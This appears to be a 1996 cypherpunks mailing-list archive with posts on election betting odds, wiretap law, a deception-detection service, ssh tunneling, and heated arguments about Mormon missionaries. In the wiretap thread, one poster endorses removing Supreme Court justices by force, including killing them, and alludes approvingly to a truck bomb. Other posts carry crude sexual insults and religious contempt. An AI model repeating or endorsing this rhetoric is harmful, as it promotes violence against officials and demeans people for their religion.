In-Reply-To: <N2XBVD17w165w@bwalk.dm.com>
Message-ID: <Pine.OSF.3.91.961005151312.26808C-100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 5 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Timmy May has no life.

much silliness elided.

Don't you think it is time to grow up and stop this nonsenses?

I bet your mother doesn't know you behave in such a manner and if she did 
she would be saddened.

Dan







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amnesia@chardos.connix.com (Anonymous)
Date: Sun, 6 Oct 1996 07:41:33 +0800
To: cypherpunks@toad.com
Subject: anonymous oddsman
Message-ID: <199610051932.PAA10053@chardos.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


Apologies for repeats, & please repost where appropriate.

Looks like advocating GAK(3-4?) hasn't hurt [and may helped]
Clinton. Dole is now an even-longer shot than before, and Perot
is back on the table at Ladbrokes, though William Hill is still
giving a better deal on him. Here are the latest odds from your
roving UK reporter. I'll try to develop a nym by next post, in
case you are interested in corresponding.

          Current Prices @ 11:00 BST Sat 4th Oct 1996
         +---------+----------------+----------------+
         |         |  Ladbroke's    | William Hill   |
         +---------+----------------+----------------+
         | Clinton |     1:9        |    1:8         |
         | Dole    |     5:1        |    9:2         |
         | Perot   |    50:1        |  250:1         |
         | Browne  | Not currently offered by either.|
         +---------+----------------+----------------+
         | New     |                |                |
         | Phone   | +44-800-524524 | +44-800-444040 |
         | Numbers:|     (Free)     |     (Free)     |
         +---------+----------------+----------------+
 
Coral, another national firm in the same business, expects to be
offering odds shortly. (+44-345-581527). Local bookmakers said to
be laying off (and putting on a hefty markup!). No explanation so
far for the lack of odds on longer-shot candidates Browne, Nader,
Hagelin, Phillips, etc. as these would all seem to be pure profit
to the oddsman, but I am not in the gambling business. Oh well.
anonymous oddsman

"Demeaning the integrity of the U.S. Presidential election process
for you on a regular basis, at no charge."









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John C. Randolph" <jcr@idiom.com>
Date: Sun, 6 Oct 1996 09:19:45 +0800
To: cypherpunks@toad.com
Subject: Missionaries (was: "Mormon Asshole?" re: GAK)
Message-ID: <199610052255.PAA08964@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain


A29441@idiom.com>, on 10/04/96 
>   at 12:36 PM, "John C. Randolph" <jcr@idiom.com> said:
>
>^^.Attilla Says:
>
>^^.>but what inflames the anti-mormon passions the most is the 
>^^.>paid clergy of other organized religions whose employment is 
>^^.>the paid ministry to their flock.  Mormons threaten their jobs;  
>^^.>the mormons have no paid ministry; it is all part of our 
>^^.>"callings" to do the Lord's work.
>
>^^.Well, speaking as one who has occasionally been called anti-mormon (although,
>^^.I'm *really* not that specific!) The only time I feel any anti-mormon
>^^."passion" is when I want to throttle one of your missionaries.  I like
>^^.sleeping in, and being awakened by a kid who wants me to join a religion is
>^^.really offensive.
>^^.
>        come, come, John...   you would deny those bright, eager faces
>    of our missionaries, who spent several years earning the money to be
>    able to support themselves on a two year mission?
X-Newsreader: NN version 6.5.0 #1 (NOV)

Bright, eager faces.. Full of the smug self-delusion that they know 
how the universe came to be, and that they have a duty to convince 
others of their Truth.  I've seen the same look on the faces of 
Scientologists.

And, BTW, I couldn't care less how these little twits finance their
activities,  or how fervent their belief may be that what they're
doing is for my own good.  It's an intrusion on my privacy, and I
find it offensive!  Is that really so hard to understand?

>        and, they do not "ask" you to join our religion;  they are only
>    offering you the chance to "investigate" our religion; your decision to
>    join is based solely on your willingness to pray, by yourself, 
>    asking the Lord if joining the Church of Jesus Christ and the Latter
>    Day Saints is the _right_ thing to do, a true Church of Jesus and
>    the Lord.   

Ask, hell!  They knock on my door, wake me up, and offend me in a
manner very similar to spamming.  They intrude on my property, to
try to sell me a line of unmitigated bullshit.  Torquemada, Loyola,
the Czars, and the "Jews For Jesus" didn't make Christians out of
my family, and the continuous proselytizing by every little upstart
sect that tags itself as Christian is pretty damn irritating.

Jews are Jews.  We're not converting. Go cope!

If any person ever tries to covert *you*, then you are fully entitled
to attempt the same patronizing act in retaliation, to that one
person. Kids going door-to-door to offer chances to investigate
their religion are out of line, and when they come to my door, they
will get said door slammed in their face, be they Mormon, Scientologist,
Lubbavitcher, or any other cult.

>        It is not for our missionaries to ask you to join the Church; 
>    they are only to assist you in your _investigation_ of our Church.
>    Don't worry, I realize some overreach their mission authority with
>    their enthusiasm.  

"Mission Authority"?  I'm sure I've never heard the term before.

>        However, if you are ever pushed by a missionary, send his/her 
>    name to me and I will pass the information along to the mission 
>    leadership that they might pause and potentially dampen his/her 
>    fire a little bit.  it happens, as to be expected.  

Shall I try to dig up a directory of all of your little boys who
are of age to go out on a mission to irritate the not-yet-converted?
If you have a master list of people that your church should leave
the hell alone, where do I apply?

>        BTW, the mission leaders are adult couples who volunteer for 
>    3 years. we had a man in our ward who was close to 70 accept a 
>    calling with his wife to oversee land acquistion and construction 
>    all over the Far East --he was out there almost 10 years -- he and 
>    his wife had 11 children and he is now close to 90 --still going 
>    (falls asleep in his chair after dinner....).

There is a term for this kind of activity.  It's called aiding and abetting.

Oh, and FYI: I grew up in southeast Asia.  I've some of your
missionaries at work, trying to convert Balinese Hindus to Mormonism.
This is a singularly barbaric act. Hindu Bali is a beautiful, peaceful
world-view, and your kids go out to pollute these wonderful people's
minds with a poisonous concept like Original Sin.  Why can't you
just let them be happy?

>       please just remember these kids are filled with their youthful 
>    zeal and the exuberance of their mission.  they are some of our 
>    best kids, and they are giving two years (10% of their life to date)
>    for their service.  

Wrong.  Your *best* kids don't take it upon themselves to irritate
their neighbors.

> 		I really regret that I did not go on a mission at
>    19 --interrupting college for 2 years.   Harvard had no provision
>    for it, and I surrendered my chance over 37 years ago. 

Oooooooh! You went to Harvard!  Maybe that explains some of your
patronizing attitude.  That school has the rather nasty belief that
its graduates have a divine right to order others about.

Any school that would grant tenure to a fascist like Galbraith, or
to a latter-day Machiavelli like Kissinger, is not an institution
I can respect.

And as for your own desire to go on a mission, think of this exchange
as the reaming you would get if you had come knocking on my father's
door.

>      our Articles of Faith include the missions.  our first 
>   missionaries covered amazing distances in the mud, and generally on
>    foot starting in 1830, the year the Church was founded, covering 
>    much of the Eastern U.S. and Canada plus very rewarding missions 
>    to England, Europe, Scandinavia, and even to Australia/NZ/Tahiti in 
>    the first 15 years.  there is an enormous population of LSD members
>    in the Solomon Island area today.

Your articles of faith are completely irrelevant to me. I don't
care if a proselytute accosts me because he's personally seen the
burning bush, or because his lucky astrology mood ring advised him
to.  The significant fact is the act of intrusion itself, not the
motivation.

>        and we belief that everyone should be permitted to practice
>    religion in any way they choose (or not choose), only asking that 
>    we be shown the same consideration.  we will even fight to grant
>    you that right!  or give you, without cost, the use of our chapels
>    if you do not have your own.  For instance, the Catholic Church
>    managed to start their congregations in Utah by using our chapels
>    in the 1850s.

Well, that's mighty white of you!  Of course, no one ever asked
for your permission, so your position on permitting other religions
is irrelevant.

BTW, I don't know if you're aware of how close the Mormons came to
being banned from the state of Israel altogether, due to the outrage
of the Hasidim over your missionaries' obnoxious habit of luring
Jewish children into a goy shul.  You may also be unaware of the
fact that when a Jewish child has been polluted in such a manner,
their fathers are obliged to have them ritually de-loused in a
not-very-inexpensive process!

Of course, you have the right to speak your mind, and even to try
to convince a Jew to believe in the Mormon faith.  Just don't be
surprised when a scion of a race that has been viciously persecuted
for its refusal to convert to the religious fad of the day tells
you to fuck off.

>^^.although they're never going to convert me either!)
>^^.
>        try investigating and see if you still can make that 
>    statement! <g>

Look, sport:  If I take a large number of hours to study your
religion, then haven't I fulfilled the purpose of the Proselytutes
about which I am complaining?

Here's an exercise for you: Find *any* archaeological corroboration
of the claim that the lost tribes of Israel ever traveled to America.
A carbon-dated Aramaic or Hebrew script, discovered by non-mormons
on either the north or south American continents would do.

For extra credit, construct a reasonable rationalization of the
LDS church's practice of racial segration from it's inception until
the 1960's.  The quakers were right in the forefront of the abolition
movement.  Where the hell were your people?

>        what would you do if you found yourself "volunteering" to 
>    accept the LDS faith?

Well, since the only way I would ever join the LDS would be under
the influence of heavy sedation or psychedelics, If I were to join
the LDS church, the Scientologists, the Moonies, or any similar
orgainzation, my friends have standing instructions to get me to
a rehab clinic.

For that matter, what would you do, if you found that your capacity
for rational cognition overwhelmed your fervent will to believe
and obey?  Would your family ostracize you?

The intolerance that your church displayed by banning all
extracirricular activities in Salt Lake City's high schools, just
so that you could continue to promote the hatred of homosexuals,
is particularly disturbing to me.  Hitler started with the gays.

>        accepting the call to be the Bishop is an enormous responsi-
>    bility, sometimes without much encouragement in some wards
>    where there are spiritual or family problems above the norm. We
>    are not perfect.

No one's asking you to be perfect, just to quit the proselytizing.
It's really patronizing, it displays contempt for the rest of
humanity, and as I've said to other mormon cult victims, it's the
only thing that prompts me to discuss your cult with any person
like yourself, who is firmly set in its delusional mindset.

And, for the safety of the pig-ignorant little hormone-soaked
adolescents that you send forth on the missions:  Give these kids
some basic sex education, will you?  How many of them come back to
Utah with AIDS, because you sent them out with no more advice than
"take a cold shower?"

What's really sad is the way that every cult member tries to convince
himself that *his* franchise has more to offer than Lifespring,
EST, or the newspaper horoscopes.  There may be a greater purpose
to human existence, but you don't know what it is, and neither does
anyone else.

-jcr






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 6 Oct 1996 07:05:04 +0800
To: cypherpunks@toad.com
Subject: Defusing Threats of Violence [AP?]
Message-ID: <1.5.4.16.19961005200122.1cef7532@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



URL in The Economist, October 5, 1996, p. 46.

Defusing Threats of Violence

http://www.cmiatl.com/


         Crisis Management International, Inc.


CMI provides crisis management services relating to "hot"
threats of violence, workplace violence prevention, and
post-incident crisis intervention. In addition, CMI provides
threat of violence and crisis response training,
psych-claims management assistance, and SCAN analysis, which
is a deception detection technique.

CMI has handled such crises as the World Trade Center and
Oklahoma City bombings, Hurricane Andrew, L.A. and San
Francisco earthquakes, as well as multitudes of air
disasters, workplace murders, and industrial accidents,
among others.

The president of CMI, Bruce Blythe, has appeared on ABC's
20/20, CNN's Headline News and MoneyLine, America's Most
Wanted, The Discovery Channel, and the television special 48
Hours: Violence in the Workplace. Mr. Blythe has also been a
forum guest on The Microsoft Network. 

               Summary of Services

          "Hot" Threats of Violence: CMI assists companies
in assessing and handling potentially dangerous people.
On-site and telephone consultations with management and
other appropriate individuals are provided by licensed
Mental Health professionals and former FBI agents to
defuse threats and stabilize potentially violent situations.

          Design Team Process for Comprehensive Workplace
Violence Prevention: Utilizing our experience in helping
hundreds of companies with workplace violence, CMI will
consult with your internal, multi-disciplinary team to
develop a comprehensive approach for preventing and
managing workplace violence. This Design Team Process will
identify foreseeable risks, enhance existing controls,
introduce new controls, develop policies and procedures
specific to the company's identified risks, and plan an
implementation schedule. The end result is a prevention
system, protected under attorney/client privilege, that
meets or exceeds OSHA and legal standards and provides a
structured management response to threats or acts of
violence that is both psychologically and legally sound.

          Threats of Violence/Crisis Response Training:
Hands-on facilitation prepares management, TOV teams, and
selected employees for potentially violent situations. The
program covers prediction, prevention, and defusing hot
threats of violence as well as aggression management and
post-crisis response. Practical case studies based on actual
experience are included.

          Post-incident Crisis Intervention: Available 24
hours a day, CMI has the worlds largest network of crisis
psychologists who are trained and experienced in corporate
crisis and disaster intervention. We provide reliable and
effective services to deal with any level of traumatic
incident. Crisis Management International has handled
hundreds of corporate crises from small to large, including
the World Trade Center bombing, Oklahoma City Federal
Building bombing, Hurricane Andrew, Los Angeles and San
Francisco earthquakes, commercial and corporate airplane
crashes, workplace murders and assaults, explosions and
other industrial accidents.

          Psych-Claims Management: CMI offers analysis and
strategy for all psychological injury litigation and
workers' comp claims. CMI's affiliate company, Claims
Management International, provides support services for the
defense in disputing claims, including Post-Traumatic Stress
Disorder (PTSD) and closed-head injuries.

          SCAN: CMI offers a proven method of detection
deception without the restrictions associated with the
employee polygraph. SCAN is an extensive analysis of a
person's spoken or written words. This methodology can be
applied to sexual harassment cases, hot threats of violence,
sabotage, shrinkage, or any situation in which deception is
suspected and your company needs to know the truth.

---------

          SCAN: Scientific Content Analysis


How SCAN Works

SCAN is an established and reliable method for obtaining
information and detecting deception from written or spoken
statements. What distinguishes SCAN from other interrogative
processes is that it first seeks to clear subjects who are
exhibiting truthful linguistic behavior. Other processes
usually operate on the assumption that all subjects have
something to hide. In SCAN, only those subjects who exhibit
inconsistencies within sentence structure, ..., and
sequences of events are labeled as problematic by the
analyst. When there ... a few of these inconsistencies, the
analyst tallies the evidence that shows the subject ...
being deceptive, or that he or she is showing sensitivity
about a certain topic. This sensitivity is a sign that the
subject is not giving the full story.

Who uses SCAN?

This methodology is employed by intelligence, investigative,
and law enforcement agencies around the world. But it is
also very useful in most areas of business and law. SCAN can
help you any time your company needs to know the truth. SCAN
is not like most interrogation techniques which are usually
invasive and confrontational. This would not be suitable for
a business setting. Whereas traditional techniques require
that an interviewer ask questions while the subject gives
short, rather uninformative answers, the collections of
material for SCAN linguistic analysis requires that the
subject talk or write at some length to give their side of
the story. This non-threatening manner of obtaining a pure
version of the subject's account yields much more material
to analyze and a greater likelihood of finding any
linguistic cues that indicate deception.

Businesses of all kinds may find themselves experiencing
threats of violence, sexual harassment cases, sabotage,
internal and external theft (shrinkage), conspiracy, and
white-collar crime. SCAN analysis helps to determine if a
seemingly threatening individual really means what they are
saying. It also helps to decide whether to believe someone
when they say they had "nothing to do with it."

Insurance companies process millions of fraudulent claims
each year, which are often settled even though the claims
adjusters have reasonable suspicions that the claims are not
legitimate. While it is impossible to catch every instance
of fraud, it is possible - and worthwhile - to have the
largest claims examined. CMI is experienced in managing
claims of all sizes and offers SCAN analysis as an adjunct
service to help obtain the whole story behind the claim.

Attorneys are naturally good at digging for information -
but it is sometimes difficult to know exactly where to dig.
A CMI analyst, present at a deposition, can discreetly
indicate to counsel where a witness may be leaving out
potentially important information. If a completed deposition
is already on file, an analyst can check witness' statements
for consistency and truthfulness, which allows for better
preparation for court or for an easy settlement. For times
when an insurance or claim comes to suit, SCAN can determine
if CMI's Claims Management Services may benefit the case.

CMI's SCAN Technology:

     is a comprehensive structuring of several techniques
and methodologies. As utilized by CMI, SCAN serves as the
foundation on which linguistic analysis can be built,
supplemented by CMI-developed technologies that include
linguistic "credibility" analysis, principles of logic,
tenets of Neuro-linguistic Programming (NLP), and
interviewing/interrogation techniques.

     is used in behalf of its client companies to:

     a. Detect deception 
     b. Assist in dangerousness assessments 
     c. Clear the innocent in situations where there are     
        numerous persons who had both access and 
        opportunity (such as sabotage, shrinkage, etc.).
     d. Provide a sufficient basis of "reasonable 
        suspicion" as required for polygraph.

     offers benefits/advantages of SCAN over other methods;
interpreting physical indicators of deception is subjective,
at best. Further, body and eye movements (and most global
indicators) vary among cultures, making accurate
interpretation even more inexact. SCAN analyzes only     
the subject's words, making it completely unobtrusive and
much more objective. SCAN can be conducted even more
effectively through a questionnaire approach.

SCAN vs. Polygraph:

The use of lie detector apparatus (polygraph) on employees
is controlled by the Employee Polygraph Protection Act of
1988 (EPPA), Public Law 100-347. EPPA restrictions include
prohibitions on polygraph use, and specific notification
requirements. The EPPA does not prohibit or restrict
written "pen and paper" tests or screening. Therefore, SCAN
can be used as both a precursor to Polygraph or as a
replacement. Further, SCAN and SCAN questionnaires can
produce results comparable to (and in some instances better
than) polygraph. SCAN may produce the desired results
and completely replace the need for polygraph, and do so in
a much less accusatory environment.

---------

More detail at links to each of CMI services.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 6 Oct 1996 09:27:53 +0800
To: cypherpunks@toad.com
Subject: Re: anonymous oddsman
Message-ID: <199610052318.QAA02295@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:32 PM 10/5/96 -0400, Anonymous wrote:

>anonymous oddsman
>
>"Demeaning the integrity of the U.S. Presidential election process
>for you on a regular basis, at no charge."

What "integrity"?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Sat, 5 Oct 1996 18:10:29 +0800
To: iang@cs.berkeley.edu (Ian Goldberg)
Subject: Re: encrypting pppd?
In-Reply-To: <534nh8$c4p@abraham.cs.berkeley.edu>
Message-ID: <199610050806.SAA20884@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> pppd doesn't necessarily run over a modem; you can "tunnel" it over another
> IP connection.
> 
> I have in fact done this very thing.  Use ssh to (encrypted) log in to
> the ppp server, and start pppd at each end.  It's been a while; I think I
> had to tweak something to make it work over a pty instead of a serial port.
> 
>    - Ian

You need to use my ssh tunneling patch:

ftp://suburbia.net/pub/mailinglists/best-of-security/179

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 6 Oct 1996 11:35:00 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: legality of wiretapping: a "key" distinction
Message-ID: <199610060111.SAA07880@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:14 PM 10/5/96 -0700, Greg Broiles wrote:
>At 04:42 PM 10/4/96 -0800, jim bell wrote:
>>I think it's really very simple.  Wiretaps in the US were illegal until 
>>1968.
>
>Then please explain what the Supreme Court was doing some 40 years prior to
>1968, in _Olmstead v. US_ 277 U.S. 438 (1928), where the product of a
>wiretap was held to be admissible because without a physical trespass there
>was no Fourth amendment violation. (This is no longer good law.) 

Then you ignored the rest of my commentary.  While wiretaps were narrowly 
held "constitutional" in about 1932, as I vaguely recall, that doesn't mean 
that they were LEGAL:  On numerous occasions subsequent to 1932,  Congress 
rejected laws which would have legalized the use of wiretaps.  They were not 
provided for under law.  Obviously, you could take the position that 
Congress could have approved of them at any time, as they did in 1968, but 
apparently it took such approval to _legalize_ them.

My position, of course, is that they are unconstitutional, period.  But I 
also believe that the cops' use of wiretaps during this period when they 
were _illegal_ undermines their credibility and judgment when they claim 
they were constitutional.  Minor point?  Maybe, but it seems to me that 
anybody who tries to claim that he's on the side of the legal system's 
dictates has a bit of a problem if it turns out he's been engaging in 
illegal activity regularly.

>>Of course, some 
>>lawyers (who have been trained to accept the status quo with little or no 
>>challenge) will disagree!  However, those same lawyers would have accepted 
>>the Dred Scott decision without question, Plessy vs. Fergusen, etc.
>
>There's a difference between understanding the status quo and liking it.
>But making up your own interpretation of the Constitution and then just
>repeating it over and over is not legal argument and doesn't win cases.

You're ENTIRELY misunderstanding (or misrepresenting) what I'm saying!  I'm 
well aware that the SC disagrees, but that is simply because they are 
entirely wrong in this matter.  Why should this surprise you?  Given the 
rash of 5-4 decisions in the last few years, there can be no illusion that 
they always come to the right decision.   I don't claim that they agree with 
me, quite the opposite.  But if anything, their error justifies removing 
them by whatever level of force turns out to be necessary.

> But
>active misunderstanding can be dangerous when you're dealing with a system
>that can and will take all of your stuff away or put you in prison or kill
>you.

Which, then, is entirely my point:  The reason I think it's going to be 
necessary to "put THEM in prison or kill THEM" is because they will 'never' 
accept the correct interpretation of the Constitution. (See?  I simply DO 
NOT ACCEPT the SC's "supremacy" in this.  Neither did the founding fathers, 
BTW.  The people are supreme, and by that I DO NOT MEAN 50%+1 of the people, 
either.)

"Never" you ask?  Okay, strictly speaking, the SC is very occasionally 
capable of admitting that it was wrong.  But frankly, I don't think they 
have the _right_ to be wrong, and I don't feel that the hypothetical 
possibility that they may fix their collective heads some day is a valid 
argument against loading up an ANFO bomb in a Ryder truck.  (there may be 
_other_ reasons against this, of course, and I'd prefer a more selective 
solution!)


>>While I'm sure that I will be corrected if this is wrong, somehow I doubt 
>>whether there has EVER been a "before-the-fact", full challenge of a wiretap 
>>order _including_ representation for the target of the wiretap.
>
>I suspect there hasn't been one because it's not required under the way the
>Constitution is and has been interpreted.

That is yet another issue that has yet to be properly challenged.  "Without 
a challenge that includes all parties, how can we be sure of any decision 
that doesn't include all parties?"


> Here's a tip: if you think of a
>way to interpret the Constitution that would make law enforcement not
>merely less efficient but effectively impossible, your interpretation will
>not be adopted, 

Your statement is inadvertently illuminating.  Legal decisions are not 
supposed to be made by people who have a stake in the outcome.  Here, you 
are acknowledging that there is no way to expect the current legal system 
will come to any kind of objective  decision concerning these matters, 
precisely because they would reject any decision which was seen as "mak[ing] 
law enforcement effectively impossible."  This sounds like a classic 
conflict-of-interest, huh?  It's not quite the same as receiving a bribe, or 
falsely convicting an ex-wife's lover of murder, or some sort of purely 
personal issue.  Nevertheless, it is a conflict of interest.

And BTW, you vastly overstated your case by suggesting that the rejection of 
wiretaps would "make law enforcement...effectively impossible."  Before 
telephones, there were no wiretaps, right?!?  (I won't claim "justice was 
done," then, but they would have claimed it was...)    And even today, 
probably 99%+ of cases decided by  courts within the US do not contain any 
wiretap evidence at all (I invite you to correct me if I'm wrong, here!) so 
I suggest that it is obvious that even the complete rejection of wiretaps 
wouldn't "make law enforcement...effectively impossible."  (how could it?)

So were you just exaggerating for effect?  No, I don't think so.  You just 
demonstrated the typical kind of biased, "the ends justifies the means" 
myopia which probably affects nearly all judges and cops, and most lawyers.

As penance, I suggest you go back and re-visit the issue.  Just exactly how 
"effectively impossible" must a decision make law enforcement before a judge 
will decide the other way on the legitimacy of a tactic?  I don't doubt that 
the Star Chamber thought that racks, thumbscrews, and various other torture 
implements were necessary for _their_ job...

>and therefore is not useful.

No, actually it's potentially quite useful!  It's just highly embarrassing 
for anyone who has a strong psychological stake in working entirely within 
the American legal system.

>It might or might not be
>theoretically elegant or logically attractive, it will not be adopted. So
>stop thinking about it. 

Ultimately, I don't think there's even a choice in the matter:  The current 
system WILL be dropped, possibly directly onto the heads of the people who 
currently populate it!  Are you going to be part of the solution, or part of 
the problem?




Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Willoughby <frankw@in.net>
Date: Sun, 6 Oct 1996 11:46:32 +0800
To: cypherpunks@toad.com
Subject: Re: [FACTS] Mountain Meadows Massacre
Message-ID: <9610060035.AA16882@su1.in.net>
MIME-Version: 1.0
Content-Type: text/plain


A few brief comments if I may:

To Mormons:
First, Mormonism has nothing to do with cryptography & therefore, has
 no place on this list.  
Second, CP is not what I would consider to be an appropriate atmosphere
 for proselytizing.  

To Non-Mormons:
First, Mormonism (or any other religion for that matter) has nothing to
 do with cryptography & hence has no place on this list.  Let's stick to 
 the subject, please.

Last, but not least, I think this list has some great material and offers
tremendous food for thought.  However, I for one would get a lot more out 
of this list if the Signal to Noise ratio were a little better.  Personally,
I find that the petty personal attacks and profanity detract from the subject 
at hand and tend to reduce the author's credibility.  

Food for thought.

Peace.

Best Regards,


Frank








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 6 Oct 1996 14:16:04 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: legality of wiretapping: a "key" distinction
In-Reply-To: <Pine.SUN.3.94.961004210349.21413A-100000@polaris>
Message-ID: <199610060343.UAA03820@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



[wiretapping involves total secrecy vs. warrants]
>This is hardly news.  An old and inconsequential distinction
>unfortunately.

please elaborate.

>"Right to choose to be in contempt of court" ?  If only I could attach a
>sound file with my howling laughter to this post.

I find it as ludicrous as you do, but it's the clear insinuation
suggested by hard-core cypherpunks / anarchists in this forum.

>Do not make the mistake of thinking there is no case law on wiretap simply
>because you have not/are too lazy to go to the library and look it up.

I said, "at least it is rarely quoted here", lawyer-boy.

>You propose to refight a case soundly resolved ages ago and you propose to
>get the rest of the list to do your homework for you.

nevertheless, you might not come off as so utterly condescending
and self-pretentious if you gave even the slightest smidgeon
of a reference yourself, instead of preferring to insult a poster.

>I propose you go to the library and do your own work for a change.

I propose you try to show some civility in cyberspace for a change.

>I wonder what caused you to think this was some kind of novel revelation.

I wonder why you always revert to sarcasm instead of making
constructive points.

>I know you think you're being very clever and original, as if somehow you
>aquired the skills of a noted constitutional scholar whilest no one was
>looking. I also know that you have not bothered to research your own
>claims.

there are no claims, merely ideas as usual. I am not posting to 
show off my pretentious laywer skills. the cpunks have you for that.

>I can't decide, however, if this is cleverness on your part in
>trying to get someone else to do all your work for you, in which case it's
>not working on me, or simple laziness, in which case it's apparent and
>unsurprising.

"your work"? apparently it is "my work" to research case law involving
wiretapping now? hmmmmm, my job description must've changed again
while I wasn't looking. @#$%%^&* don't you hate it when that happens!!

Unicorn, instead of posting something that is so utterly devoid of
any informational value, and merely tries to invent new and clever
ways of tangentially, scurrilously insulting someone without directly
addressing a single actual point
involved, why don't you do the obvious and use the
post as a leaping off point to show off your own mastery of the
arcania and minutia of our legal system, such as it was intended?
do you really think you are getting reputation brownie points or
something by doing this? hee, hee.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 6 Oct 1996 12:58:06 +0800
To: Anonymous <nobody@zifi.genetics.utah.edu>
Subject: [complete noise] Re: [IMPORTANT] Blowfish
In-Reply-To: <199610050719.BAA07279@zifi.genetics.utah.edu>
Message-ID: <Pine.BSF.3.91.961005205019.905D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




I was thinking of putting Dimitri in for KOTM, so he could put "KOTMx2"
(or does it go right to KOTM^2 ?) after his name. Unfortunately, the
"rules"  clearly prevent anyone from winning more than once. I guess
he'll have to do without, unless we help him out by petitioning for a 
second term (support one of your own - he's working so hard for it).

http://www.wetware.com/mlegare/kotm/#kotm


On Sat, 5 Oct 1996, Anonymous wrote:

> Timothy May's 16Kb brain's single convolution is 
> directly wired to his rectum for input and his T1 
> mouth for output. That's 16K bits, not bytes. Anal 
> intercourse has caused extensive brain damage.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Sun, 6 Oct 1996 13:42:04 +0800
To: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Inflation-index bonds and private e-currency
In-Reply-To: <01IA3GAFNCWK8Y57AQ@mbcl.rutgers.edu>
Message-ID: <Pine.BSF.3.91.961005212133.905O-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 30 Sep 1996, E. Allen Smith wrote:

> 	One of the attractions of privately-produced currencies is as a
> hedge against inflation; this development may be a competitor to this
> idea. On the other hand, this setup does have an unavailability in _time_
> of the money (more so than other, equal-security bonds of the same duration),
> which may offset its greater spendability.
> 	-Allen
> 

This isn't a new idea - Massachusetts (I think it was Mass., anyway) 
implemented inflation-adjusted pay for soldiers during the revolutionary war.
They didn't have an inflation index, so they rushed one into place based 
on agricultural products.

Just another near-election appeal to the middle-class voter.

-r.w.

> >    BARRON'S Online - Market Surveillance for the Financial Elite
> >     _________________________________________________________________
> >   Barron's
> >     _________________________________________________________________
> >        CLINTON UNVEILING NEW GOVERNMENT BOND WITH INFLATION PROTECTION
> >   __________________________________________________________________________
> >      Copyright &copy 1996 Nando.net
> >      Copyright &copy 1996 The Associated Press
>       
> >   WASHINGTON (Sep 25, 1996 11:12 a.m. EDT) -- President Clinton, in his
> >   latest election-year appeal to the middle class, is unveiling details
> >   of a new type of government bond that will offer investors protection
> >   against inflation.
>    
> [...]
> 
> >   As the program was explained, the securities will protect the
> >   principal against inflation, as measured by the consumer price index.
> >   As an example, the official said, if inflation increases 3 percent in
> >   a given year, a $1,000 bond would be adjusted upward to $1,030 at the
> >   end of that year.
>    
> >   By offering this protection, interest rates on the bonds will be lower
> >   than on regular 10-year notes that do not provide inflation
> >   protection.
>    
> [...]
> 
> >   The notion of tying government securities to inflation has not been
> >   tried in the United States, but other countries have been offering
> >   such investments for some time.
>    
> >   Such bonds have been available in Britain since 1981 and are also
> >   offered in Canada, New Zealand, Australia, Israel and Sweden.
>    
> >    Copyright &copy 1996 Nando.net
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 6 Oct 1996 14:31:37 +0800
To: cypherpunks@toad.com
Subject: Voice Stress Analysis of Debates?
Message-ID: <199610060428.VAA19939@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:01 PM 10/5/96 -0400, John Young wrote:
>URL in The Economist, October 5, 1996, p. 46.
>http://www.cmiatl.com/
>         Crisis Management International, Inc.
>CMI provides crisis management services relating to "hot"
>threats of violence, workplace violence prevention, and
>post-incident crisis intervention. In addition, CMI provides
>threat of violence and crisis response training,
>psych-claims management assistance, and SCAN analysis, which
>is a deception detection technique.

This reminds me...   Years ago, somebody developed a technique called "Voice 
Stress Analysis," which was supposed to detect small variations in a 
person's voice in response to stress.  Not exactly a lie-detector, but it 
was supposed to do nearly the same thing.   Does anybody plan to analyze the 
debates for stress?  Is there software to do this?  (Tried to do a 
web-search; didn't see anything.)


